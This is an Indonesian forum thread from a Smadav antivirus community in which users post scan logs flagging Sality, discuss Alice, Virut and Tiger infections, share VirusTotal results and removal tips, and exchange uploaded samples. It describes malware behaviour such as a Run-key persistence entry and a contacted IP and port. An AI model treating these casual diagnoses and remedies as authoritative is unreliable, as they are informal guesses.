=> C:\Windows\servicing\TrustedInstaller.exe
=> C:\Program Files\CCleaner\CCleaner.exe
=> C:\Program Files\Smadav\SMΔRTP.exe

Detected Virus :
=> Sality
   -Detected Process won't be killed
   -C:\Program Files\Zentimo\Zentimo.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\Panda USB Vaccine\USBVaccine.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\Smadav\SMΔRTP.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\IObit\Advanced SystemCare 5\ASCTray.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcAppFlt.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\Common Files\VMware\USB\vmware-usbarbitrator.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Windows\System32\vmnat.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\VMware\VMware Player\vmware-authd.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Windows\System32\vmnetdhcp.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcIp.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\Internet Download Manager\IEMonitor.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Users\Administrator\AppData\Roaming\svchost.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Windows\System32\wbem\WmiPrvSE.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\IObit\Game Booster 3\gbtray.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\Opera\opera.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Windows\System32\svchost.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\Smart\CDMA USB Modem\CDMA USB Modem.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Windows\System32\audiodg.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Windows\System32\msiexec.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Windows\servicing\TrustedInstaller.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\CCleaner\CCleaner.exe

Infected Registry Values :
=> Zentimo xStorage Manager
   -HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
   -Sality Injected Virus Value
=> DefaultValue
   -HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden
   -Different DWORD Value
=> WarningIfNotDefault
   -HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden
   -Lost Value
=> ScreenSaveActive
   -HKEY_CURRENT_USER\Control Panel\Desktop
   -Different String Value

Hidden Files/Folders
=> C:\Windows\System32
   -Folder
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 19, 2012, 01:09:57 AM
@3ndiixz: Maa baru sempat balas.. :(
Kutip
Boss,, aq punya sampel mirip dengan infeksi Ramnit pd .htm .html

klo filenya dbuka pake Notepad,,, pada bagian bawah sendiri akan ada semacem script virus,,, setelah melihat dr Virustotal.com 14/42 AV mndeteksi adanya infeksi file trsebut,,, salah satu AV mndeteksinya sbgai Virus.VBS.Sasan
Ini virus Html hasil infeksi dari Virus alice.. Coba baca di sini: http://smadaver.com/konsultasi-virus/virus-vbe/20

File yang terakhir agan upload itu virus gann.. Hasil di virustotal.com (https://www.virustotal.com/file/362090e71ae9023cc93323a649e9e177457ec60c8627abf8e3eb99c2aadf38bf/analysis/1326905690/) = 21/43. Mungkin ini varian baru yang belum banyak dikenali..
Alasan kuat ane menilai ini virus:
Sorry but you are not allowed to view spoiler contents.
3. Mencantumkan value berikut agar file.exe dapat otomatis aktif setiap kali user masuk windows (terdaftar sebagai "Windows Defender"):
HKEY_USERS\S-1-5-21-*\software\Microsoft\Windows\CurrentVersion\Run,
Windows Defender = C:\Documents and Settings\[Nama User]\Application Data\file.exe

4. Svchost.exe Mencoba akses ke IP 79.117.98.143 (http://en.utrace.de/ip-address/79.117.98.143) Port 4564[/spoiler]Coba upload salah satu file exe yang terdeteksi sebagai Sality itu ke sini gann.. Biar dibantu rekan-rekan di sini.. :)
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 19, 2012, 06:47:52 AM
Detected Virus :
=> Sality
   -Detected Process won't be killed
   -C:\Program Files\Zentimo\Zentimo.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Windows\System32\wbem\WmiPrvSE.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\Internet Download Manager\IEMonitor.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\Smart\CDMA USB Modem\CDMA USB Modem.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\Mozilla Firefox\firefox.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Windows\System32\svchost.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\Opera\opera.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\Mozilla Firefox\plugin-container.exe

Infected Registry Values :
=> Zentimo xStorage Manager
   -HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
   -Sality Injected Virus Value  ======>>> selalu key ini dianggap Smadav terinfeksi

Hidden Files/Folders
=> C:\Windows\System32
   -Folder
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 19, 2012, 06:51:34 AM
apakah virus ni mnginjeksi file exe????

aq scan pake DrWeb tnggal 8 Jan 12 kok bilangnya aman2 ae,,,

matursuwun ya Bosss ki@mhu  :-bd  :-bd  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 19, 2012, 10:13:21 PM
apakah virus ni mnginjeksi file exe????

aq scan pake DrWeb tnggal 8 Jan 12 kok bilangnya aman2 ae,,,

matursuwun ya Bosss ki@mhu  :-bd  :-bd  :-bd
Jangan dipanggil bos donk..  :-[
Ane scan file exe plugin-container.exe dengan Smadav tetapi tidak terdeteksi sebagai virus. Koq di tempat agan terdeteksi yahh? Bisa agan upload sampel yang lain? Misalnya Zentimo.exe.. :)
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 19, 2012, 10:35:28 PM
==============================
Log File of Smadav 2011 Rev. 8.8
==============================

Scanning Results :
=> Time & Date : 22:19:49, on 01-19-2012
=> Finishing Time : 4 seconds
=> Folder Scanned :0
=> File Scanned : 0
=> File Detected : 7
=> File Cleaned : 0
=> Value Scanned : 958
=> Value Detected: 1
=> Value Fixed: 0
=> Path Scanned: 0
=> Path Hidden: 1
=> Path Unhidden: 0

==============================
Before Scanning
==============================
Suspected Paths :
=> Fine(Level 2) as  : 2 Process
   -C:\Windows\System32\nvvsvc.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Zentimo\ZentimoService.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcAppFlt.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\PANDORA.TV\PanService\PandoraService.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Common Files\VMware\USB\vmware-usbarbitrator.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Windows\System32\vmnat.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Windows\System32\vmnetdhcp.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files\Unlocker\UnlockerAssistant.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcIp.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\VMware\VMware Player\vmware-authd.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Panda USB Vaccine\USBVaccine.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -D:\% M.A.S.T.E.R  P.R.O.G.R.A.M\Kemo AntiVirus Indonesia 9.7-1\KEMO AntiVirus.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files\Internet Download Manager\IDMan.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files\Zentimo\Zentimo.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Internet Download Manager\IEMonitor.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Smart\CDMA USB Modem\CDMA USB Modem.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Opera\opera.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Windows\System32\mspaint.exe
=> Fine(Level 2) as  : 1 Startup
   -c:\Windows\System32\Macromed\Flash\flashplayerupdateservice.exe
=> Fine(Level 2) as  : 1 Startup
   -c:\program files\glary utilities\initialize.exe
=> Unknown(Level 4) as  : 3 RegString
   -cmd.exe

Running Processes :
=> N/A
=> N/A
=> C:\Windows\System32\smss.exe
=> C:\Windows\System32\csrss.exe
=> C:\Windows\System32\wininit.exe
=> C:\Windows\System32\csrss.exe
=> C:\Windows\System32\services.exe
=> C:\Windows\System32\lsass.exe
=> C:\Windows\System32\lsm.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\winlogon.exe
=> C:\Program Files\Zentimo\ZentimoService.exe
=> C:\Windows\System32\nvvsvc.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\nvvsvc.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\spoolsv.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\taskhost.exe
=> C:\Windows\System32\dwm.exe
=> C:\Windows\explorer.exe
=> C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcAppFlt.exe
=> C:\Program Files\PANDORA.TV\PanService\PandoraService.exe
=> C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
=> C:\Program Files\Common Files\VMware\USB\vmware-usbarbitrator.exe
=> C:\Windows\System32\vmnat.exe
=> C:\Windows\System32\vmnetdhcp.exe
=> C:\Program Files\Unlocker\UnlockerAssistant.exe
=> C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcIp.exe
=> C:\Program Files\VMware\VMware Player\vmware-authd.exe
=> C:\Program Files\Panda USB Vaccine\USBVaccine.exe
=> D:\% M.A.S.T.E.R  P.R.O.G.R.A.M\Kemo AntiVirus Indonesia 9.7-1\KEMO AntiVirus.exe
=> C:\Program Files\Internet Download Manager\IDMan.exe
=> C:\Program Files\Smadav\SMΔRTP.exe
=> C:\Program Files\Zentimo\Zentimo.exe
=> C:\Program Files\Internet Download Manager\IEMonitor.exe
=> C:\Windows\System32\wbem\WmiPrvSE.exe
=> C:\Program Files\Smart\CDMA USB Modem\CDMA USB Modem.exe
=> C:\Program Files\Opera\opera.exe
=> C:\Program Files\Smadav\SMΔRTP.exe
=> C:\Windows\System32\mspaint.exe
=> C:\Windows\System32\svchost.exe

==============================
After Scanning
==============================
Suspected Paths :
=> Fine(Level 2) as  : 2 Process
   -C:\Windows\System32\nvvsvc.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Zentimo\ZentimoService.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcAppFlt.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\PANDORA.TV\PanService\PandoraService.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Common Files\VMware\USB\vmware-usbarbitrator.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Windows\System32\vmnat.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Windows\System32\vmnetdhcp.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files\Unlocker\UnlockerAssistant.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcIp.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\VMware\VMware Player\vmware-authd.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Panda USB Vaccine\USBVaccine.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -D:\% M.A.S.T.E.R  P.R.O.G.R.A.M\Kemo AntiVirus Indonesia 9.7-1\KEMO AntiVirus.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files\Internet Download Manager\IDMan.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files\Zentimo\Zentimo.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Internet Download Manager\IEMonitor.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Smart\CDMA USB Modem\CDMA USB Modem.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Opera\opera.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Windows\System32\mspaint.exe
=> Fine(Level 2) as  : 1 Startup
   -c:\Windows\System32\Macromed\Flash\flashplayerupdateservice.exe
=> Fine(Level 2) as  : 1 Startup
   -c:\program files\glary utilities\initialize.exe
=> Unknown(Level 4) as  : 3 RegString
   -cmd.exe

Running Processes :
=> N/A
=> N/A
=> C:\Windows\System32\smss.exe
=> C:\Windows\System32\csrss.exe
=> C:\Windows\System32\wininit.exe
=> C:\Windows\System32\csrss.exe
=> C:\Windows\System32\services.exe
=> C:\Windows\System32\lsass.exe
=> C:\Windows\System32\lsm.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\winlogon.exe
=> C:\Program Files\Zentimo\ZentimoService.exe
=> C:\Windows\System32\nvvsvc.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\nvvsvc.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\spoolsv.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\taskhost.exe
=> C:\Windows\System32\dwm.exe
=> C:\Windows\explorer.exe
=> C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcAppFlt.exe
=> C:\Program Files\PANDORA.TV\PanService\PandoraService.exe
=> C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
=> C:\Program Files\Common Files\VMware\USB\vmware-usbarbitrator.exe
=> C:\Windows\System32\vmnat.exe
=> C:\Windows\System32\vmnetdhcp.exe
=> C:\Program Files\Unlocker\UnlockerAssistant.exe
=> C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcIp.exe
=> C:\Program Files\VMware\VMware Player\vmware-authd.exe
=> C:\Program Files\Panda USB Vaccine\USBVaccine.exe
=> D:\% M.A.S.T.E.R  P.R.O.G.R.A.M\Kemo AntiVirus Indonesia 9.7-1\KEMO AntiVirus.exe
=> C:\Program Files\Internet Download Manager\IDMan.exe
=> C:\Program Files\Smadav\SMΔRTP.exe
=> C:\Program Files\Zentimo\Zentimo.exe
=> C:\Program Files\Internet Download Manager\IEMonitor.exe
=> C:\Windows\System32\wbem\WmiPrvSE.exe
=> C:\Program Files\Smart\CDMA USB Modem\CDMA USB Modem.exe
=> C:\Program Files\Opera\opera.exe
=> C:\Program Files\Smadav\SMΔRTP.exe
=> C:\Windows\System32\mspaint.exe
=> C:\Windows\System32\svchost.exe

Detected Virus :
=> Sality
   -Detected Process won't be killed
   -C:\Program Files\Zentimo\Zentimo.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\Internet Download Manager\IEMonitor.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Windows\System32\wbem\WmiPrvSE.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\Smart\CDMA USB Modem\CDMA USB Modem.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Program Files\Opera\opera.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Windows\System32\mspaint.exe
=> Sality
   -Detected Process [Won't be Killed]
   -C:\Windows\System32\svchost.exe

Infected Registry Values :
=> Zentimo xStorage Manager
   -HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
   -Sality Injected Virus Value

Hidden Files/Folders
=> C:\Windows\System32
   -Folder
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 19, 2012, 10:38:10 PM
uda tk upload Bossss  8)  8)  8)

maap klo lama

siiipp Bosss  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: M. Ridzky pada Januari 19, 2012, 10:45:11 PM
kena virus sality itu kykx,,, coba pke sality kille ratw RMSality
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 19, 2012, 11:07:24 PM
kena virus sality itu kykx,,, coba pke sality kille ratw RMSality


pasti dech gak baca postingan halaman sebelumnya  >:(  >:(

uda tak scan pake DrWeb, tdsskiller v2.6.19.0, Sality Killer, Virut Killer (Kaspersky), Qvodkilller, Alicekiller (PCMAV), Top100_Oct_32b (BitDefender), Kemo AV ,,,,, semuanya nihil,, nggak kedetek adanya virus

hanya Smadav yang mndeteksi kompiq terinfeksi Sality,,, padahal Bosss Ki@mhu bilang kompiq terserang Alice,, cz sebelumnya q sempet utak-atik file .html yang terinfeksi Alice yang berubah mnjadi .hta stelah itu baru muncul RTP Smadav yang mngindikasikan kompiq terinfeksi Sality


Begggiiitttttoooo Pak Hapackerrrrs  :-bd  :-bd  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: M. Ridzky pada Januari 19, 2012, 11:16:29 PM
mungkin kena infek virus EPO lainya nih,, bisa upload file samplenya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 19, 2012, 11:28:58 PM
uda di upload Pak Hapackerrrrsss

liat dulu donk halaman sebelumnya ^_^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: M. Ridzky pada Januari 19, 2012, 11:39:51 PM
:D sudah barusan, sepertinya itu memang virus,, kemungkinan virus yg terinfkesi virus EPO jd virusnya bertambah kemampuan mengifeksi file executable jg,, sepertinya kompi agan udh kena tuh :D  :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 19, 2012, 11:43:31 PM
@3ndiixz: Berarti Terdeteksinya Sality ini beserta munculnya adobe.exe, svchost.exe, dan file.exe ini berawal dari virus alice itu yahh? Seingat agan, kompinya pernah terinfeksi virus apa sebelum ini?

Ane uda coba jalankan Zentimo.exe tapi tidak terjadi apa-apa. Padahal ada tingkah laku virus pada adobe.exe, svchost.exe, dan file.exe tapi file yang terinfeksi ini koq tidak terjadi apa-apa yah setelah dijalankan?  ???

@hapackers: Bisa agan ceritakan tingkah laku virus EPO itu?   :)
Ane tadi coba googling tapi gak ngerti.. Terlalu ke coding..  ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: M. Ridzky pada Januari 19, 2012, 11:49:36 PM
file adobe,exe dan svchost.exe itu sepertinya punya kode khusus yg cm 1x kali proses,, itu bs diliht dari body size filenya yg cm berukuran 2 kb,, dan beberapa fungsi api yg diimportnya jg sedikit,, tp ngk menutup kemungkinan tu virus pke teknik Call API By NAme yg di ecrypt jd ngk kelihatan API yg dia gunakan., :D :D :D

Virus EPO :D coba baca" ini gan
http://vxheavens.com/lib/vmo01.html
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 20, 2012, 12:22:32 AM
@hapackers:Thanks infonya..  :-bd

@3ndiixz: Blok dulu adobe.exe/svchost.exe (pilih salah satu saja karena kode MD5-nya sama) dan file.exe dengan AppAdmin (http://www.softpedia.com/dyn-postdownload.php?p=169487&t=4&i=1). Tutorialnya bisa dibaca pada Blog ane.. Tapi ane gak ngasih linknya di sini (ntar dikira promosi..  ;D).

Setelah diblok, coba jalankan kembali file yang telah diblok tadidengan klik ganda. Jika ada pesan error, berarti sudah berhasil diblok. Setelah itu hapus ketiga file tadi dan buat folder baru dengan nama file.exe, svchost.exe, dan adobe.exe dan tempatkan pada lokasi folder tempat ketiga file tadi berada untuk mencegahnya terbentuk kembali.. Fix semua registry yang terdeteksi oleh Smadav dan coba lihat apakah kambuh kembali setelah difix?

Ane sudah upload file Coba upload file Zentimo.exe ke virustotal.com dan ini (https://www.virustotal.com/file/57e1e4d9c7664c1fafbf1c47ed2544a117c9ada4e587e1a40ac695fba693de5b/analysis/1326994409/) hasilnya. Pantau terus hasil ini dan tunggu saja sampai Dr.web atau AV lain bisa merepair file exe yang telah diinfeksinya.. Atau agan bisa membantu mereka dengan mengupload sampelnya langsung kepada mereka.. :)
Salut teknik Heuristic Smadav yang sudah bisa mengenali file exe yang terinfeksi ini padahal masih banyak AV luar yang belum mendeteksinya..  :-bd


NB:
Sorry but you are not allowed to view spoiler contents.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 20, 2012, 06:56:26 AM
MANTAP lh.......
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: M. Ridzky pada Januari 20, 2012, 08:22:19 AM
itu hasil scan dari virustotal menyatakan klo itu virus virut, :D komputer agan udh terinfeksi virus tuh,, lain kali hati" dlm menjalankan file exe, jgn lupa pake antivirus yang selalu Up To Date :D :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cedrik pada Januari 20, 2012, 09:42:11 AM
cara uplod virusnya gimana gan?ko lama banget yah?mau kasih contoh virus ne..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: acongg pada Januari 20, 2012, 10:56:25 AM
itu hasil scan dari virustotal menyatakan klo itu virus virut, :D komputer agan udh terinfeksi virus tuh,, lain kali hati" dlm menjalankan file exe, jgn lupa pake antivirus yang selalu Up To Date :D :D :D
gitu aja Rempong  ;D begini gw ajarin ya masbro : pilih replay, pilih addtional option, pilih browse (cari lokasi file yg mau dikirim, sebelumnya di kompress dulu), lalu pilih Post. selsei deh masbro.... gampang kan  ;D :-bd
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 20, 2012, 05:21:23 PM
itu hasil scan dari virustotal menyatakan klo itu virus virut, :D komputer agan udh terinfeksi virus tuh,, lain kali hati" dlm menjalankan file exe, jgn lupa pake antivirus yang selalu Up To Date :D :D :D

bigini lho Pak hapackerrrrsssss,,, kmren ntu aq iseng nyoba buka file .html yang trinfeksi Alice yg brubah mnjadi file .hta pake notepad,, tyus pada isi yang paling bawah itu ad script "On error resume next" gettooo

beberapa hari kmudian aq buka Smadav,, eeehhhh gak taunya kompiq bilangnya terinfeksi Sality,,, lgsng aj q scan pake removal yang q sebutkan diatas,, nyatanya nggak ada yang mndteksi adanya virus,, hanya Smadav yang bilang kompiq terinfeksi Sality,,, tyuuussssssss........ q upload dech file yang dicurigai terinfeksi Sality kesini,,,
beggituuu pak hapackeerrrrrssss
 8)  8)  8)  8)

asyik asyik asyik
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: firmantaruna3 pada Januari 20, 2012, 05:40:46 PM
saya ikut nyumbang sampel virus nih, baru Emsisoft/Ikarus, Norman, VIPRE, & K7 yang detect..  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: M. Ridzky pada Januari 20, 2012, 05:47:43 PM
owh begeto toh,,, lain kali jgn mainan ama virus itu yah wkwkwk :D :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 20, 2012, 06:35:58 PM
itu hasil scan dari virustotal menyatakan klo itu virus virut, :D komputer agan udh terinfeksi virus tuh,, lain kali hati" dlm menjalankan file exe, jgn lupa pake antivirus yang selalu Up To Date :D :D :D

bigini lho Pak hapackerrrrsssss,,, kmren ntu aq iseng nyoba buka file .html yang trinfeksi Alice yg brubah mnjadi file .hta pake notepad,, tyus pada isi yang paling bawah itu ad script "On error resume next" gettooo

beberapa hari kmudian aq buka Smadav,, eeehhhh gak taunya kompiq bilangnya terinfeksi Sality,,, lgsng aj q scan pake removal yang q sebutkan diatas,, nyatanya nggak ada yang mndteksi adanya virus,, hanya Smadav yang bilang kompiq terinfeksi Sality,,, tyuuussssssss........ q upload dech file yang dicurigai terinfeksi Sality kesini,,,
beggituuu pak hapackeerrrrrssss
 8)  8)  8)  8)

asyik asyik asyik
Jika hanya dengan membuka file .hta dengan Notepad, tidak bisa sampai menginfeksi sistem. Mungkin kompi agan terinfeksi dari file lain yahh?  ???
Uda dicoba caranya gann? Apakah berhasil? :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: M. Ridzky pada Januari 20, 2012, 07:52:36 PM
Perlu diperhatikan juga skwt menganalisi virus,, jgn asal klik, lht dlu itu virus ada domplengan virus lain ngk di balik body nya,, paling aman analisa virus di lingkungan virtual :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 20, 2012, 08:03:10 PM
Perlu diperhatikan juga skwt menganalisi virus,, jgn asal klik, lht dlu itu virus ada domplengan virus lain ngk di balik body nya,, paling aman analisa virus di lingkungan virtual :D :D
Yup.. Betul gann..
Khusus untuk file HTML yang sudah terinfeksi virus, tetap aman walaupun dibuka dengan Browser selain IE. CMIIW..  ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 20, 2012, 10:00:48 PM
Virusnya tak biarin beranak pinak dikompiq,, lumayan kompiq buat ternak virus,,, sapa tau bisa djual panennya ke Pak Hapackeerrrsssssss,,,

hehehehehehehe

asyik asyik asyik
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 20, 2012, 10:06:05 PM
Virusnya tak biarin beranak pinak dikompiq,, lumayan kompiq buat ternak virus,,, sapa tau bisa djual panennya ke Pak Hapackeerrrsssssss,,,

hehehehehehehe

asyik asyik asyik
Gimana kompienya sekarang? Masih bermasalah dengan virusnya? :)
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 20, 2012, 10:24:36 PM
@ Bosss Ki@mhu

log scan DrWeb

winamp5623_full_emusic-7plus_all.exe;C:\Documents and Settings\Administrator\Documents\3ndiixz;Win32.WowSub.4;Cured.;
wrar40b2.exe;C:\Documents and Settings\Administrator\Documents\3ndiixz;Win32.WowSub.4;Cured.;

untuk file td yang di .zip nggak terdeteksi oleh DrWeb,, (biasanya jg dscan dalemnya) hanya file exe nya yg lgsung d scan,,, bisa d cure/repair oleh DrWeb, makanya q suka pke,, ukuran file yang terinfeksi setelah d cure berkurang atow kembali ke ukuran semula
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 20, 2012, 10:36:06 PM
@ Bosss Ki@mhu

log scan DrWeb

winamp5623_full_emusic-7plus_all.exe;C:\Documents and Settings\Administrator\Documents\3ndiixz;Win32.WowSub.4;Cured.;
wrar40b2.exe;C:\Documents and Settings\Administrator\Documents\3ndiixz;Win32.WowSub.4;Cured.;

untuk file td yang di .zip nggak terdeteksi oleh DrWeb,, (biasanya jg dscan dalemnya) hanya file exe nya yg lgsung d scan,,, bisa d cure/repair oleh DrWeb, makanya q suka pke,, ukuran file yang terinfeksi setelah d cure berkurang atow kembali ke ukuran semula
Makasih boss 3ndiixz..  :-bd
Infonya sangat membantu.. Ternyata virus tiger (http://smadaver.com/konsultasi-virus/mengatasi-virus-flyff-666-dll-vbs/180/) dideteksi Dr.Web sebagai Wowsub. Itu karena pada varian pertama virus Tiger, dia membuat Service Driver Wowsub.sys dan kebetulan pada varian yang ane dapat (http://smadaver.com/konsultasi-virus/upload-virus-ke-forum/1030/) dari rekan aRRe, membuat Service dengan nama yang lain yaitu Forter.sys. Semoga ini menambah wawasan bagi kita semua.. Jadi kesimpulan terakhirnya adalah: Dr.Web Cure It sudah bisa membersihkan file-file Exe yang terinfeksi oleh virus Tiger..  :-bd

Cek dompet Smad Point yah gann..  ;)
Berarti file yang di Zip itu lolos yahh? :)
Terus bagaimana dengan virus file.exe, svchost.exe, dan adobe.exe kemarin? Gimana perkembangannya? :)
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 20, 2012, 11:04:47 PM
MATURSUWUN BOSSS  :-bd  :-bd

Bosss Ki@mhu baek dech,,,,,  :-[  :-[  :-*  :-*

untuk virus Alice yang mmbuat 3 file (adobe, file, svchost) DrWeb tanggal 8 Jan 2012 lum mndteksi,, nggak tw klo tanggal 20 ni uda masuk DB atow lum,, aq biasa dunlut DrWeb sebulan skali sbagai REMOVER ANDALAN n serbaguna slaen remover khusus sperti Sality Killer, Virut Killer, Ramnit Killer, dkk.

Matursuwun lho Boss Ki@mhu,,,

asyik asyik asyik
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: M. Ridzky pada Januari 21, 2012, 12:29:53 AM
